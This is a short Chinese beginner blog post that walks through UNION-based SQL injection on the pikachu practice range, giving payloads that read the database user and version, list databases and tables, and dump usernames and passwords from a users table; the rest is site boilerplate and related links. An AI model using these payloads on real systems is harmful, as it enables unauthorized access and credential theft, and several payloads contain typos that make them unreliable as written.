【新手初学】读取数据库数据

若初&

已于 2025-03-28 21:01:39 修改

阅读量341

点赞数 9

文章标签：数据库 web安全前端

于 2025-03-28 21:00:58 首次发布

本文链接：https://blog.youkuaiyun.com/2401_89233381/article/details/146571707

版权

利用注入点让SQL注入语句执行读取数据库数据相关的操作！

以下均以pikachu靶场的字符型注入为例进行介绍说明

一、读取用户名，数据库版本信息

在原URL后面添加如下代码：

   ' union select user(),version(）--+

效果：

补充：判断查询的字段个数order by

这时，就需要在相应环境下进行测试判断：主要是使用 order by 来判断

在后面添加1，2，3，4，5，6....进行测试，直到不再报错！就判断出了其查询字段个数！

如下：

二、读取mysql所有库名

在原URL后面添加如下语句：

‘ union select 1,group_concat(schema_name) from information_schema,schemata+--+

效果：

三、读取pikachu库的所有表名

在原URL后面添加如下语句：

’unnion select 1,group_concat(table_name) from information_schema.tables where table_schema=database+--+

效果：

四、读取所有字段数据

在原URL后面添加如下语句：

‘ union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users+--+

效果：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

若初&

关注关注

9
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Python 读取数据库数据

04-22

278

读取数据库数据

数据获取_数据库数据的读取

weixin_45556639的博客

04-12

2688

读取MySQL数据库 MySQL数据库是开源的关系型数据库，可以通过python与其进行连接。首先需要安装第三方库pymysql → pip install pymysql并且电脑上已经安装好该数据库 # 设置cell多行输出 from IPython.core.interactiveshell import InteractiveShell InteractiveShell.ast_node...

参与评论您还未登录，请先登录后发表或查看评论

数据库中表的读取

pcsjs的专栏

10-16

579

连接好sqlserver数据库后。比如你的数据库表的名称是：tb_user. 数据库表从左到右的顺序是：id，name,password,position. Statement stmt=con.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY); ResultSet rs=st

SQL读取数据库数据(.sql)导入数据

静下心来写代码

08-18

1391

<?php $conn = mysql_connect('127.0.0.1','root',''); mysql_select_db('wechat'); $sql=file_get_contents("./wechat.sql"); //读入$sql $list=explode(";",$sql); //用explode()函数把‍$sql字符串以“;”分割为数组 foreach(

如何快速获取数据库表的指定数据

最新发布

2401_89523735的博客

12-27

586

有时我们需要从数据库中查询数据，用来分析或定位问题。比如根据某些操作记录的id，获取对应执行的sql语句。痛点 1、比较耗时。需通过数据库管理工具挨个执行sql语句获取数据，有10个id就需要执行10次； 2、不好存档、可读性差。通过执行sql语句查询到数据后，需要手动复制到某个文档存档，既不方便，可读性也差。

MySQL数据库（三）：读取数据库数据

weixin_47040031的博客

06-24

1945

上一节，我们介绍了数据库的基本操作，以及最后演示了如何使用库来连接数据库，在实际应用中，我们通常需要按照指定的条件对数据库进行操作，即增删改查操作，这是非常重要的！这一节我们继续通过一个例子，来演示如何查询数据库。

C#新手入门：如何用C#读取Access数据库数据

资源摘要信息:"C#新手实例：读取Access...此示例代码为初学者提供了一个简单的C#读取Access数据库数据的实例。通过实践这类基础操作，初学者可以逐步掌握C#在数据库领域的应用，并为进一步的数据库编程打下坚实的基础。

VB新手入门：用SQL查询显示Access数据库数据

本篇将详细介绍如何使用VB通过SQL语句读取并显示Access数据库中的数据。 ### 知识点一：Visual Basic 简介 Visual Basic是微软公司推出的一种简单易学的编程语言，特别适合初学者入门。VB是一种面向对象的编程语言...

Spring实现登录（适合新手未连接数据库）

06-27

由于我们暂时不连接数据库，可以创建一个静态的用户列表来模拟数据存储： ```java public class UserRepository { public static List<User> users = Arrays.asList( new User("admin", "admin123"), new User(...

新手必读：.NET初学宝典的数据库与控件精髓

ADO.NET提供了一种面向对象的方式来处理数据，包括连接数据库、执行SQL命令、读取和更新数据等操作。Entity Framework则是基于ORM（对象关系映射）技术的框架，它允许开发者使用.NET对象的方式来操作数据库，无需...

新手学PHP之数据库操作详解及乱码解决！

12-17

在处理乱码问题时，注意到`createcon()`方法中使用了`mysql_query("SET NAMES 'GBK'")`，这将设置字符编码为GBK，以确保从数据库读取的数据正确显示。在Linux环境下，如果你的数据库使用的是UTF-8编码，应改为`mysql...

读取数据库信息及显示

12-10

通过文本框输入数据库的IP、名称及密码，再填入所要读取的表名称，按下按钮可通过DataGridView显示内容，同时也可以把dataGridView导出为Excel。

Python数据库数据的读取

Fo*(Bi)的博客

06-28

3007

从两个模块的connect函数看，两者几乎没有差异，而且参数含义也是一致的，所不同的是pymysql模块中connect函数的host参数表示需要访问的服务器，而pymssql函数中对应的参数是server。需要注意的是，如果你手动创建了一个数据库连接，而没有使用连接池或者没有正确地关闭连接，就可能会出现连接泄漏或资源泄漏的问题。使用 SQLAlchemy 创建的数据库连接是由 SQLAlchemy 管理的，所以在读取完数据库后，不需要手动关闭连接，而是由 SQLAlchemy 自动管理连接的生命周期。

Python数据可视化：数据的读取

李威威wiwi的博客

06-10

2640

数据的读取是进行数据预处理、数据建模和分析的基础。对于不同的数据文件，pandas提供了不同函数进行读取。pandas内置了10余种读写函数。常见的数据文件格式有3种形式，分别是CSV文件、Excel文件和数据库。CSV文件是以纯文本形式存储表格数据（数字和文本）。CSV文件由任意数目的记录组成，记录间以某种换行符分隔。每条记录由字段组成，字段间的分隔符是其他字符或字符串，最常见的是逗号或制表符。

JDBC利用代码读取数据库中的数据

v9296的博客

07-21

1479

JDBC利用代码读取数据库中的数据

简单页面+java后台+数据库，实现从页面对数据库的增删改查